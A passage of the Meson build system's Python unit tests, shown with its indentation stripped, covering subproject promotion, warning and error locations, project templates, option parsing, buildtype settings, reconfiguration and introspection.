self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
